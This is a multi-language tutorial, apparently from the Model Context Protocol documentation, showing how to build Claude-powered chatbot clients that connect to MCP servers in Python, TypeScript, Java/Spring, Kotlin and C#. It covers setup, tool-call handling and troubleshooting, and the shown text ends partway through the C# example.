# Build an MCP client
Source: https://modelcontextprotocol.io/docs/develop/build-client
Get started building your own client that can integrate with all MCP servers.
In this tutorial, you'll learn how to build an LLM-powered chatbot client that connects to MCP servers.
Before you begin, it helps to have gone through our [Build an MCP Server](/docs/develop/build-server) tutorial so you can understand how clients and servers communicate.
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/mcp-client-python)
## System Requirements
Before starting, ensure your system meets these requirements:
* Mac or Windows computer
* Latest Python version installed
* Latest version of `uv` installed
## Setting Up Your Environment
First, create a new Python project with `uv`:
```bash macOS/Linux theme={null}
# Create project directory
uv init mcp-client
cd mcp-client
# Create virtual environment
uv venv
# Activate virtual environment
source .venv/bin/activate
# Install required packages
uv add mcp anthropic python-dotenv
# Remove boilerplate files
rm main.py
# Create our main file
touch client.py
```
```powershell Windows theme={null}
# Create project directory
uv init mcp-client
cd mcp-client
# Create virtual environment
uv venv
# Activate virtual environment
.venv\Scripts\activate
# Install required packages
uv add mcp anthropic python-dotenv
# Remove boilerplate files
del main.py
# Create our main file
new-item client.py
```
## Setting Up Your API Key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Create a `.env` file to store it:
```bash theme={null}
echo "ANTHROPIC_API_KEY=your-api-key-goes-here" > .env
```
Add `.env` to your `.gitignore`:
```bash theme={null}
echo ".env" >> .gitignore
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's set up our imports and create the basic client class:
```python theme={null}
import asyncio
from typing import Optional
from contextlib import AsyncExitStack

from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client

from anthropic import Anthropic
from dotenv import load_dotenv

load_dotenv()  # load environment variables from .env


class MCPClient:
    def __init__(self):
        # Initialize session and client objects
        self.session: Optional[ClientSession] = None
        self.exit_stack = AsyncExitStack()
        self.anthropic = Anthropic()

    # methods will go here
```
### Server Connection Management
Next, we'll implement the method to connect to an MCP server:
```python theme={null}
async def connect_to_server(self, server_script_path: str):
    """Connect to an MCP server

    Args:
        server_script_path: Path to the server script (.py or .js)
    """
    is_python = server_script_path.endswith('.py')
    is_js = server_script_path.endswith('.js')
    if not (is_python or is_js):
        raise ValueError("Server script must be a .py or .js file")

    command = "python" if is_python else "node"
    server_params = StdioServerParameters(
        command=command,
        args=[server_script_path],
        env=None
    )

    stdio_transport = await self.exit_stack.enter_async_context(stdio_client(server_params))
    self.stdio, self.write = stdio_transport
    self.session = await self.exit_stack.enter_async_context(ClientSession(self.stdio, self.write))

    await self.session.initialize()

    # List available tools
    response = await self.session.list_tools()
    tools = response.tools
    print("\nConnected to server with tools:", [tool.name for tool in tools])
```
### Query Processing Logic
Now let's add the core functionality for processing queries and handling tool calls:
```python theme={null}
async def process_query(self, query: str) -> str:
    """Process a query using Claude and available tools"""
    messages = [
        {
            "role": "user",
            "content": query
        }
    ]

    response = await self.session.list_tools()
    available_tools = [{
        "name": tool.name,
        "description": tool.description,
        "input_schema": tool.inputSchema
    } for tool in response.tools]

    # Initial Claude API call
    response = self.anthropic.messages.create(
        model="claude-sonnet-4-20250514",
        max_tokens=1000,
        messages=messages,
        tools=available_tools
    )

    # Process response and handle tool calls
    final_text = []

    assistant_message_content = []
    for content in response.content:
        if content.type == 'text':
            final_text.append(content.text)
            assistant_message_content.append(content)
        elif content.type == 'tool_use':
            tool_name = content.name
            tool_args = content.input

            # Execute tool call
            result = await self.session.call_tool(tool_name, tool_args)
            final_text.append(f"[Calling tool {tool_name} with args {tool_args}]")

            assistant_message_content.append(content)
            messages.append({
                "role": "assistant",
                "content": assistant_message_content
            })
            messages.append({
                "role": "user",
                "content": [
                    {
                        "type": "tool_result",
                        "tool_use_id": content.id,
                        "content": result.content
                    }
                ]
            })

            # Get next response from Claude
            response = self.anthropic.messages.create(
                model="claude-sonnet-4-20250514",
                max_tokens=1000,
                messages=messages,
                tools=available_tools
            )

            final_text.append(response.content[0].text)

    return "\n".join(final_text)
```
### Interactive Chat Interface
Now we'll add the chat loop and cleanup functionality:
```python theme={null}
async def chat_loop(self):
    """Run an interactive chat loop"""
    print("\nMCP Client Started!")
    print("Type your queries or 'quit' to exit.")

    while True:
        try:
            query = input("\nQuery: ").strip()

            if query.lower() == 'quit':
                break

            response = await self.process_query(query)
            print("\n" + response)

        except Exception as e:
            print(f"\nError: {str(e)}")

async def cleanup(self):
    """Clean up resources"""
    await self.exit_stack.aclose()
```
### Main Entry Point
Finally, we'll add the main execution logic:
```python theme={null}
import sys

async def main():
    if len(sys.argv) < 2:
        print("Usage: python client.py <path_to_server_script>")
        sys.exit(1)

    client = MCPClient()
    try:
        await client.connect_to_server(sys.argv[1])
        await client.chat_loop()
    finally:
        await client.cleanup()

if __name__ == "__main__":
    asyncio.run(main())
```
You can find the complete `client.py` file [here](https://github.com/modelcontextprotocol/quickstart-resources/blob/main/mcp-client-python/client.py).
## Key Components Explained
### 1. Client Initialization
* The `MCPClient` class initializes with session management and API clients
* Uses `AsyncExitStack` for proper resource management
* Configures the Anthropic client for Claude interactions
### 2. Server Connection
* Supports both Python and Node.js servers
* Validates server script type
* Sets up proper communication channels
* Initializes the session and lists available tools
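Tools aren't the only thing a session can enumerate. If the connected server also exposes resources or prompts, the same `ClientSession` can list them; a minimal sketch with a hypothetical helper name (servers that don't implement a capability may reject these requests, hence the guards):

```python theme={null}
# Hypothetical extension, not part of the tutorial code above
async def print_server_capabilities(session: ClientSession):
    tools = (await session.list_tools()).tools
    print("Tools:", [tool.name for tool in tools])

    try:
        resources = (await session.list_resources()).resources
        print("Resources:", [resource.name for resource in resources])
    except Exception:
        print("Resources: not supported by this server")

    try:
        prompts = (await session.list_prompts()).prompts
        print("Prompts:", [prompt.name for prompt in prompts])
    except Exception:
        print("Prompts: not supported by this server")
```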
### 3. Query Processing
* Maintains conversation context
* Handles Claude's responses and tool calls
* Manages the message flow between Claude and tools
* Combines results into a coherent response
### 4. Interactive Interface
* Provides a simple command-line interface
* Handles user input and displays responses
* Includes basic error handling
* Allows graceful exit
### 5. Resource Management
* Proper cleanup of resources
* Error handling for connection issues
* Graceful shutdown procedures
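One way to see why `AsyncExitStack` pays off: the client can be turned into an async context manager, so the session and stdio transport are unwound in reverse order even when an exception escapes the chat loop. A sketch, not part of the tutorial code:

```python theme={null}
class MCPClient:
    # ... __init__, connect_to_server, chat_loop as above ...

    async def __aenter__(self):
        return self

    async def __aexit__(self, exc_type, exc, tb):
        # aclose() exits every context entered on the stack, in reverse order
        await self.exit_stack.aclose()

async def main():
    async with MCPClient() as client:
        await client.connect_to_server("path/to/server.py")
        await client.chat_loop()
```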
## Common Customization Points
1. **Tool Handling**
* Modify `process_query()` to handle specific tool types
* Add custom error handling for tool calls
* Implement tool-specific response formatting
2. **Response Processing**
* Customize how tool results are formatted
* Add response filtering or transformation
* Implement custom logging
3. **User Interface**
* Add a GUI or web interface
* Implement rich console output
* Add command history or auto-completion
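As an illustration of the first two points, tool calls could be routed through a wrapper that logs each invocation, catches failures, and flattens the result's content blocks into plain text. A sketch with hypothetical names:

```python theme={null}
import logging

logger = logging.getLogger("mcp-client")

async def call_tool_safely(session: ClientSession, tool_name: str, tool_args: dict) -> str:
    """Log the call, catch failures, and keep only textual result blocks."""
    logger.info("Calling tool %s with args %s", tool_name, tool_args)
    try:
        result = await session.call_tool(tool_name, tool_args)
    except Exception as exc:
        logger.exception("Tool %s failed", tool_name)
        return f"[Tool {tool_name} failed: {exc}]"
    return "\n".join(
        block.text
        for block in result.content
        if getattr(block, "type", None) == "text"
    )
```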
## Running the Client
To run your client with any MCP server:
```bash theme={null}
uv run client.py path/to/server.py # python server
uv run client.py path/to/build/index.js # node server
```
If you're continuing [the weather tutorial from the server quickstart](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python), your command might look something like this: `python client.py .../quickstart-resources/weather-server-python/weather.py`
The client will:
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
Here's an example of what it should look like if connected to the weather server from the server quickstart:
## How It Works
When you submit a query:
1. The client gets the list of available tools from the server
2. Your query is sent to Claude along with tool descriptions
3. Claude decides which tools (if any) to use
4. The client executes any requested tool calls through the server
5. Results are sent back to Claude
6. Claude provides a natural language response
7. The response is displayed to you
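Note that steps 3–6 can repeat: `process_query()` above handles a single round of tool use, but nothing stops Claude from requesting another tool after seeing the first result. A sketch of the generalized loop (the same API calls as the tutorial, just iterated):

```python theme={null}
async def run_until_done(anthropic, session, messages, available_tools):
    """Call Claude repeatedly until it stops requesting tools."""
    while True:
        response = anthropic.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=1000,
            messages=messages,
            tools=available_tools,
        )
        tool_uses = [c for c in response.content if c.type == "tool_use"]
        if not tool_uses:
            return response  # step 6: a plain natural-language answer

        # Step 4: execute every requested tool call through the server
        messages.append({"role": "assistant", "content": response.content})
        results = []
        for tool_use in tool_uses:
            result = await session.call_tool(tool_use.name, tool_use.input)
            results.append({
                "type": "tool_result",
                "tool_use_id": tool_use.id,
                "content": result.content,
            })
        # Step 5: send the results back to Claude
        messages.append({"role": "user", "content": results})
```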
## Best practices
1. **Error Handling**
* Always wrap tool calls in try-catch blocks
* Provide meaningful error messages
* Gracefully handle connection issues
2. **Resource Management**
* Use `AsyncExitStack` for proper cleanup
* Close connections when done
* Handle server disconnections
3. **Security**
* Store API keys securely in `.env`
* Validate server responses
* Be cautious with tool permissions
4. **Tool Names**
* Tool names can be validated according to the format specified [here](/specification/draft/server/tools#tool-names)
* If a tool name conforms to the specified format, it should not fail validation by an MCP client
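A sketch of such a validation check; the pattern below is illustrative only, so treat the spec page linked above as the authoritative format:

```python theme={null}
import re

# Illustrative pattern - consult the tool-names section of the spec
# for the authoritative character set and length limits.
TOOL_NAME_PATTERN = re.compile(r"^[a-zA-Z0-9_-]{1,128}$")

def is_valid_tool_name(name: str) -> bool:
    return bool(TOOL_NAME_PATTERN.match(name))
```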
## Troubleshooting
### Server Path Issues
* Double-check that the path to your server script is correct
* Use the absolute path if the relative path isn't working
* For Windows users, make sure to use forward slashes (/) or escaped backslashes (\\) in the path
* Verify the server file has the correct extension (.py for Python or .js for Node.js)
Example of correct path usage:
```bash theme={null}
# Relative path
uv run client.py ./server/weather.py
# Absolute path
uv run client.py /Users/username/projects/mcp-server/weather.py
# Windows path (either format works)
uv run client.py C:/projects/mcp-server/weather.py
uv run client.py C:\\projects\\mcp-server\\weather.py
```
### Response Timing
* The first response might take up to 30 seconds to return
* This is normal and happens while:
* The server initializes
* Claude processes the query
* Tools are being executed
* Subsequent responses are typically faster
* Don't interrupt the process during this initial waiting period
### Common Error Messages
If you see:
* `FileNotFoundError`: Check your server path
* `Connection refused`: Ensure the server is running and the path is correct
* `Tool execution failed`: Verify the tool's required environment variables are set
* `Timeout error`: Consider increasing the timeout in your client configuration
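For the timeout case, the Python SDK's `ClientSession` accepts a per-request read timeout; a sketch of how `connect_to_server` could pass one (check your SDK version for the exact parameter name):

```python theme={null}
from datetime import timedelta

self.session = await self.exit_stack.enter_async_context(
    ClientSession(
        self.stdio,
        self.write,
        read_timeout_seconds=timedelta(seconds=60),  # assumption: raise as needed
    )
)
```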
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/mcp-client-typescript)
## System Requirements
Before starting, ensure your system meets these requirements:
* Mac or Windows computer
* Node.js 17 or higher installed
* Latest version of `npm` installed
* Anthropic API key (Claude)
## Setting Up Your Environment
First, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create project directory
mkdir mcp-client-typescript
cd mcp-client-typescript
# Initialize npm project
npm init -y
# Install dependencies
npm install @anthropic-ai/sdk @modelcontextprotocol/sdk dotenv
# Install dev dependencies
npm install -D @types/node typescript
# Create source file
touch index.ts
```
```powershell Windows theme={null}
# Create project directory
md mcp-client-typescript
cd mcp-client-typescript
# Initialize npm project
npm init -y
# Install dependencies
npm install @anthropic-ai/sdk @modelcontextprotocol/sdk dotenv
# Install dev dependencies
npm install -D @types/node typescript
# Create source file
new-item index.ts
```
Update your `package.json` to set `type: "module"` and a build script:
```json package.json theme={null}
{
  "type": "module",
  "scripts": {
    "build": "tsc && chmod 755 build/index.js"
  }
}
```
Create a `tsconfig.json` in the root of your project:
```json tsconfig.json theme={null}
{
  "compilerOptions": {
    "target": "ES2022",
    "module": "Node16",
    "moduleResolution": "Node16",
    "outDir": "./build",
    "rootDir": "./",
    "strict": true,
    "esModuleInterop": true,
    "skipLibCheck": true,
    "forceConsistentCasingInFileNames": true
  },
  "include": ["index.ts"],
  "exclude": ["node_modules"]
}
```
## Setting Up Your API Key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Create a `.env` file to store it:
```bash theme={null}
echo "ANTHROPIC_API_KEY=" > .env
```
Add `.env` to your `.gitignore`:
```bash theme={null}
echo ".env" >> .gitignore
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's set up our imports and create the basic client class in `index.ts`:
```typescript theme={null}
import { Anthropic } from "@anthropic-ai/sdk";
import {
  MessageParam,
  Tool,
} from "@anthropic-ai/sdk/resources/messages/messages.mjs";
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
import readline from "readline/promises";
import dotenv from "dotenv";

dotenv.config();

const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
if (!ANTHROPIC_API_KEY) {
  throw new Error("ANTHROPIC_API_KEY is not set");
}

class MCPClient {
  private mcp: Client;
  private anthropic: Anthropic;
  private transport: StdioClientTransport | null = null;
  private tools: Tool[] = [];

  constructor() {
    this.anthropic = new Anthropic({
      apiKey: ANTHROPIC_API_KEY,
    });
    this.mcp = new Client({ name: "mcp-client-cli", version: "1.0.0" });
  }
  // methods will go here
}
```
### Server Connection Management
Next, we'll implement the method to connect to an MCP server:
```typescript theme={null}
async connectToServer(serverScriptPath: string) {
  try {
    const isJs = serverScriptPath.endsWith(".js");
    const isPy = serverScriptPath.endsWith(".py");
    if (!isJs && !isPy) {
      throw new Error("Server script must be a .js or .py file");
    }
    const command = isPy
      ? process.platform === "win32"
        ? "python"
        : "python3"
      : process.execPath;

    this.transport = new StdioClientTransport({
      command,
      args: [serverScriptPath],
    });
    await this.mcp.connect(this.transport);

    const toolsResult = await this.mcp.listTools();
    this.tools = toolsResult.tools.map((tool) => {
      return {
        name: tool.name,
        description: tool.description,
        input_schema: tool.inputSchema,
      };
    });
    console.log(
      "Connected to server with tools:",
      this.tools.map(({ name }) => name)
    );
  } catch (e) {
    console.log("Failed to connect to MCP server: ", e);
    throw e;
  }
}
```
### Query Processing Logic
Now let's add the core functionality for processing queries and handling tool calls:
```typescript theme={null}
async processQuery(query: string) {
  const messages: MessageParam[] = [
    {
      role: "user",
      content: query,
    },
  ];

  const response = await this.anthropic.messages.create({
    model: "claude-sonnet-4-20250514",
    max_tokens: 1000,
    messages,
    tools: this.tools,
  });

  const finalText = [];

  for (const content of response.content) {
    if (content.type === "text") {
      finalText.push(content.text);
    } else if (content.type === "tool_use") {
      const toolName = content.name;
      const toolArgs = content.input as { [x: string]: unknown } | undefined;

      const result = await this.mcp.callTool({
        name: toolName,
        arguments: toolArgs,
      });
      finalText.push(
        `[Calling tool ${toolName} with args ${JSON.stringify(toolArgs)}]`
      );

      messages.push({
        role: "user",
        content: result.content as string,
      });

      const response = await this.anthropic.messages.create({
        model: "claude-sonnet-4-20250514",
        max_tokens: 1000,
        messages,
      });

      finalText.push(
        response.content[0].type === "text" ? response.content[0].text : ""
      );
    }
  }

  return finalText.join("\n");
}
```
### Interactive Chat Interface
Now we'll add the chat loop and cleanup functionality:
```typescript theme={null}
async chatLoop() {
  const rl = readline.createInterface({
    input: process.stdin,
    output: process.stdout,
  });

  try {
    console.log("\nMCP Client Started!");
    console.log("Type your queries or 'quit' to exit.");

    while (true) {
      const message = await rl.question("\nQuery: ");
      if (message.toLowerCase() === "quit") {
        break;
      }
      const response = await this.processQuery(message);
      console.log("\n" + response);
    }
  } finally {
    rl.close();
  }
}

async cleanup() {
  await this.mcp.close();
}
```
### Main Entry Point
Finally, we'll add the main execution logic:
```typescript theme={null}
async function main() {
  if (process.argv.length < 3) {
    console.log("Usage: node index.ts <path_to_server_script>");
    return;
  }
  const mcpClient = new MCPClient();
  try {
    await mcpClient.connectToServer(process.argv[2]);
    await mcpClient.chatLoop();
  } catch (e) {
    console.error("Error:", e);
    await mcpClient.cleanup();
    process.exit(1);
  } finally {
    await mcpClient.cleanup();
    process.exit(0);
  }
}

main();
```
## Running the Client
To run your client with any MCP server:
```bash theme={null}
# Build TypeScript
npm run build
# Run the client
node build/index.js path/to/server.py # python server
node build/index.js path/to/build/index.js # node server
```
If you're continuing [the weather tutorial from the server quickstart](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-typescript), your command might look something like this: `node build/index.js .../quickstart-resources/weather-server-typescript/build/index.js`
**The client will:**
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
## How It Works
When you submit a query:
1. The client gets the list of available tools from the server
2. Your query is sent to Claude along with tool descriptions
3. Claude decides which tools (if any) to use
4. The client executes any requested tool calls through the server
5. Results are sent back to Claude
6. Claude provides a natural language response
7. The response is displayed to you
## Best practices
1. **Error Handling**
* Use TypeScript's type system for better error detection
* Wrap tool calls in try-catch blocks
* Provide meaningful error messages
* Gracefully handle connection issues
2. **Security**
* Store API keys securely in `.env`
* Validate server responses
* Be cautious with tool permissions
## Troubleshooting
### Server Path Issues
* Double-check that the path to your server script is correct
* Use the absolute path if the relative path isn't working
* For Windows users, make sure to use forward slashes (/) or escaped backslashes (\\) in the path
* Verify the server file has the correct extension (.js for Node.js or .py for Python)
Example of correct path usage:
```bash theme={null}
# Relative path
node build/index.js ./server/build/index.js
# Absolute path
node build/index.js /Users/username/projects/mcp-server/build/index.js
# Windows path (either format works)
node build/index.js C:/projects/mcp-server/build/index.js
node build/index.js C:\\projects\\mcp-server\\build\\index.js
```
### Response Timing
* The first response might take up to 30 seconds to return
* This is normal and happens while:
* The server initializes
* Claude processes the query
* Tools are being executed
* Subsequent responses are typically faster
* Don't interrupt the process during this initial waiting period
### Common Error Messages
If you see:
* `Error: Cannot find module`: Check your build folder and ensure TypeScript compilation succeeded
* `Connection refused`: Ensure the server is running and the path is correct
* `Tool execution failed`: Verify the tool's required environment variables are set
* `ANTHROPIC_API_KEY is not set`: Check your .env file and environment variables
* `TypeError`: Ensure you're using the correct types for tool arguments
* `BadRequestError`: Ensure you have enough credits to access the Anthropic API
This is a quickstart demo based on Spring AI MCP auto-configuration and boot starters.
To learn how to create sync and async MCP clients manually, consult the [Java SDK Client](/sdk/java/mcp-client) documentation.
This example demonstrates how to build an interactive chatbot that combines Spring AI's Model Context Protocol (MCP) with the [Brave Search MCP Server](https://github.com/modelcontextprotocol/servers-archived/tree/main/src/brave-search). The application creates a conversational interface powered by Anthropic's Claude AI model that can perform internet searches through Brave Search, enabling natural language interactions with real-time web data.
[You can find the complete code for this tutorial here.](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/web-search/brave-chatbot)
## System Requirements
Before starting, ensure your system meets these requirements:
* Java 17 or higher
* Maven 3.6+
* npx package manager
* Anthropic API key (Claude)
* Brave Search API key
## Setting Up Your Environment
1. Install npx (Node Package eXecute):
First, make sure to install [npm](https://docs.npmjs.com/downloading-and-installing-node-js-and-npm)
and then run:
```bash theme={null}
npm install -g npx
```
2. Clone the repository:
```bash theme={null}
git clone https://github.com/spring-projects/spring-ai-examples.git
cd spring-ai-examples/model-context-protocol/web-search/brave-chatbot
```
3. Set up your API keys:
```bash theme={null}
export ANTHROPIC_API_KEY='your-anthropic-api-key-here'
export BRAVE_API_KEY='your-brave-api-key-here'
```
4. Build the application:
```bash theme={null}
./mvnw clean install
```
5. Run the application using Maven:
```bash theme={null}
./mvnw spring-boot:run
```
Make sure you keep your `ANTHROPIC_API_KEY` and `BRAVE_API_KEY` secure!
## How it Works
The application integrates Spring AI with the Brave Search MCP server through several components:
### MCP Client Configuration
1. Required dependencies in pom.xml:
```xml theme={null}
<dependency>
    <groupId>org.springframework.ai</groupId>
    <artifactId>spring-ai-starter-mcp-client</artifactId>
</dependency>
<dependency>
    <groupId>org.springframework.ai</groupId>
    <artifactId>spring-ai-starter-model-anthropic</artifactId>
</dependency>
```
2. Application properties (application.yml):
```yml theme={null}
spring:
  ai:
    mcp:
      client:
        enabled: true
        name: brave-search-client
        version: 1.0.0
        type: SYNC
        request-timeout: 20s
        stdio:
          root-change-notification: true
          servers-configuration: classpath:/mcp-servers-config.json
        toolcallback:
          enabled: true
    anthropic:
      api-key: ${ANTHROPIC_API_KEY}
```
This activates the `spring-ai-starter-mcp-client`, which creates one or more `McpClient`s based on the provided server configuration.
The `spring.ai.mcp.client.toolcallback.enabled=true` property enables the tool callback mechanism, which automatically registers all MCP tools as Spring AI tools.
It is disabled by default.
3. MCP Server Configuration (`mcp-servers-config.json`):
```json theme={null}
{
  "mcpServers": {
    "brave-search": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-brave-search"],
      "env": {
        "BRAVE_API_KEY": "<YOUR_BRAVE_API_KEY>"
      }
    }
  }
}
```
### Chat Implementation
The chatbot is implemented using Spring AI's ChatClient with MCP tool integration:
```java theme={null}
var chatClient = chatClientBuilder
    .defaultSystem("You are useful assistant, expert in AI and Java.")
    .defaultToolCallbacks((Object[]) mcpToolAdapter.toolCallbacks())
    .defaultAdvisors(new MessageChatMemoryAdvisor(new InMemoryChatMemory()))
    .build();
```
Key features:
* Uses Claude AI model for natural language understanding
* Integrates Brave Search through MCP for real-time web search capabilities
* Maintains conversation memory using InMemoryChatMemory
* Runs as an interactive command-line application
### Build and run
```bash theme={null}
./mvnw clean install
java -jar ./target/ai-mcp-brave-chatbot-0.0.1-SNAPSHOT.jar
```
or
```bash theme={null}
./mvnw spring-boot:run
```
The application will start an interactive chat session where you can ask questions. The chatbot will use Brave Search when it needs to find information from the internet to answer your queries.
The chatbot can:
* Answer questions using its built-in knowledge
* Perform web searches when needed using Brave Search
* Remember context from previous messages in the conversation
* Combine information from multiple sources to provide comprehensive answers
### Advanced Configuration
The MCP client supports additional configuration options:
* Client customization through `McpSyncClientCustomizer` or `McpAsyncClientCustomizer`
* Multiple clients with multiple transport types: `STDIO` and `SSE` (Server-Sent Events)
* Integration with Spring AI's tool execution framework
* Automatic client initialization and lifecycle management
For WebFlux-based applications, you can use the WebFlux starter instead:
```xml theme={null}
<dependency>
    <groupId>org.springframework.ai</groupId>
    <artifactId>spring-ai-mcp-client-webflux-spring-boot-starter</artifactId>
</dependency>
```
This provides similar functionality but uses a WebFlux-based SSE transport implementation, recommended for production deployments.
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/kotlin-sdk/tree/main/samples/kotlin-mcp-client)
## System Requirements
Before starting, ensure your system meets these requirements:
* Java 17 or higher
* Anthropic API key (Claude)
## Setting up your environment
First, let's install `java` and `gradle` if you haven't already.
You can download `java` from the [official Oracle JDK website](https://www.oracle.com/java/technologies/downloads/).
Verify your `java` installation:
```bash theme={null}
java --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir kotlin-mcp-client
cd kotlin-mcp-client
# Initialize a new kotlin project
gradle init
```
```powershell Windows theme={null}
# Create a new directory for our project
md kotlin-mcp-client
cd kotlin-mcp-client
# Initialize a new kotlin project
gradle init
```
After running `gradle init`, you will be presented with options for creating your project.
Select **Application** as the project type, **Kotlin** as the programming language, and **Java 17** as the Java version.
Alternatively, you can create a Kotlin application using the [IntelliJ IDEA project wizard](https://kotlinlang.org/docs/jvm-get-started.html).
After creating the project, add the following dependencies:
```kotlin build.gradle.kts theme={null}
val mcpVersion = "0.4.0"
val slf4jVersion = "2.0.9"
val anthropicVersion = "0.8.0"

dependencies {
    implementation("io.modelcontextprotocol:kotlin-sdk:$mcpVersion")
    implementation("org.slf4j:slf4j-nop:$slf4jVersion")
    implementation("com.anthropic:anthropic-java:$anthropicVersion")
}
```
```groovy build.gradle theme={null}
def mcpVersion = '0.4.0'
def slf4jVersion = '2.0.9'
def anthropicVersion = '0.8.0'

dependencies {
    implementation "io.modelcontextprotocol:kotlin-sdk:$mcpVersion"
    implementation "org.slf4j:slf4j-nop:$slf4jVersion"
    implementation "com.anthropic:anthropic-java:$anthropicVersion"
}
```
Also, add the following plugins to your build script:
```kotlin build.gradle.kts theme={null}
plugins {
    id("com.gradleup.shadow") version "8.3.9"
}
```
```groovy build.gradle theme={null}
plugins {
    id 'com.gradleup.shadow' version '8.3.9'
}
```
## Setting up your API key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
Set up your API key:
```bash theme={null}
export ANTHROPIC_API_KEY='your-anthropic-api-key-here'
```
Make sure you keep your `ANTHROPIC_API_KEY` secure!
## Creating the Client
### Basic Client Structure
First, let's create the basic client class:
```kotlin theme={null}
class MCPClient : AutoCloseable {
    private val anthropic = AnthropicOkHttpClient.fromEnv()
    private val mcp: Client = Client(clientInfo = Implementation(name = "mcp-client-cli", version = "1.0.0"))
    private lateinit var tools: List<ToolUnion>

    // methods will go here

    override fun close() {
        runBlocking {
            mcp.close()
            anthropic.close()
        }
    }
}
```
### Server connection management
Next, we'll implement the method to connect to an MCP server:
```kotlin theme={null}
suspend fun connectToServer(serverScriptPath: String) {
    try {
        val command = buildList {
            when (serverScriptPath.substringAfterLast(".")) {
                "js" -> add("node")
                "py" -> add(if (System.getProperty("os.name").lowercase().contains("win")) "python" else "python3")
                "jar" -> addAll(listOf("java", "-jar"))
                else -> throw IllegalArgumentException("Server script must be a .js, .py or .jar file")
            }
            add(serverScriptPath)
        }

        val process = ProcessBuilder(command).start()
        val transport = StdioClientTransport(
            input = process.inputStream.asSource().buffered(),
            output = process.outputStream.asSink().buffered()
        )

        mcp.connect(transport)

        val toolsResult = mcp.listTools()
        tools = toolsResult?.tools?.map { tool ->
            ToolUnion.ofTool(
                Tool.builder()
                    .name(tool.name)
                    .description(tool.description ?: "")
                    .inputSchema(
                        Tool.InputSchema.builder()
                            .type(JsonValue.from(tool.inputSchema.type))
                            .properties(tool.inputSchema.properties.toJsonValue())
                            .putAdditionalProperty("required", JsonValue.from(tool.inputSchema.required))
                            .build()
                    )
                    .build()
            )
        } ?: emptyList()
        println("Connected to server with tools: ${tools.joinToString(", ") { it.tool().get().name() }}")
    } catch (e: Exception) {
        println("Failed to connect to MCP server: $e")
        throw e
    }
}
```
Also create a helper function to convert from `JsonObject` to `JsonValue` for Anthropic:
```kotlin theme={null}
private fun JsonObject.toJsonValue(): JsonValue {
    val mapper = ObjectMapper()
    val node = mapper.readTree(this.toString())
    return JsonValue.fromJsonNode(node)
}
```
### Query processing logic
Now let's add the core functionality for processing queries and handling tool calls:
```kotlin theme={null}
private val messageParamsBuilder: MessageCreateParams.Builder = MessageCreateParams.builder()
    .model(Model.CLAUDE_SONNET_4_20250514)
    .maxTokens(1024)

suspend fun processQuery(query: String): String {
    val messages = mutableListOf(
        MessageParam.builder()
            .role(MessageParam.Role.USER)
            .content(query)
            .build()
    )

    val response = anthropic.messages().create(
        messageParamsBuilder
            .messages(messages)
            .tools(tools)
            .build()
    )

    val finalText = mutableListOf<String>()
    response.content().forEach { content ->
        when {
            content.isText() -> finalText.add(content.text().getOrNull()?.text() ?: "")

            content.isToolUse() -> {
                val toolName = content.toolUse().get().name()
                val toolArgs =
                    content.toolUse().get()._input().convert(object : TypeReference<Map<String, JsonValue>>() {})
                // ... (the remaining tool-call handling, chat loop, and entry point are
                // truncated here; see the complete Kotlin sample linked above)
```
[You can find the complete code for this tutorial here.](https://github.com/modelcontextprotocol/csharp-sdk/tree/main/samples/QuickstartClient)
## System Requirements
Before starting, ensure your system meets these requirements:
* .NET 8.0 or higher
* Anthropic API key (Claude)
* Windows, Linux, or macOS
## Setting up your environment
First, create a new .NET project:
```bash theme={null}
dotnet new console -n QuickstartClient
cd QuickstartClient
```
Then, add the required dependencies to your project:
```bash theme={null}
dotnet add package ModelContextProtocol --prerelease
dotnet add package Anthropic.SDK
dotnet add package Microsoft.Extensions.Hosting
dotnet add package Microsoft.Extensions.AI
```
## Setting up your API key
You'll need an Anthropic API key from the [Anthropic Console](https://console.anthropic.com/settings/keys).
```bash theme={null}
dotnet user-secrets init
dotnet user-secrets set "ANTHROPIC_API_KEY" "<your_api_key_here>"
```
## Creating the Client
### Basic Client Structure
First, let's set up the basic client class in the file `Program.cs`:
```csharp theme={null}
using Anthropic.SDK;
using Microsoft.Extensions.AI;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Hosting;
using ModelContextProtocol.Client;
using ModelContextProtocol.Protocol.Transport;

var builder = Host.CreateApplicationBuilder(args);

builder.Configuration
    .AddEnvironmentVariables()
    .AddUserSecrets<Program>();
```
This creates the beginnings of a .NET console application that can read the API key from user secrets.
Next, we'll set up the MCP client:
```csharp theme={null}
var (command, arguments) = GetCommandAndArguments(args);

var clientTransport = new StdioClientTransport(new()
{
    Name = "Demo Server",
    Command = command,
    Arguments = arguments,
});

await using var mcpClient = await McpClient.CreateAsync(clientTransport);

var tools = await mcpClient.ListToolsAsync();
foreach (var tool in tools)
{
    Console.WriteLine($"Connected to server with tools: {tool.Name}");
}
```
Add this function at the end of the `Program.cs` file:
```csharp theme={null}
static (string command, string[] arguments) GetCommandAndArguments(string[] args)
{
    return args switch
    {
        [var script] when script.EndsWith(".py") => ("python", args),
        [var script] when script.EndsWith(".js") => ("node", args),
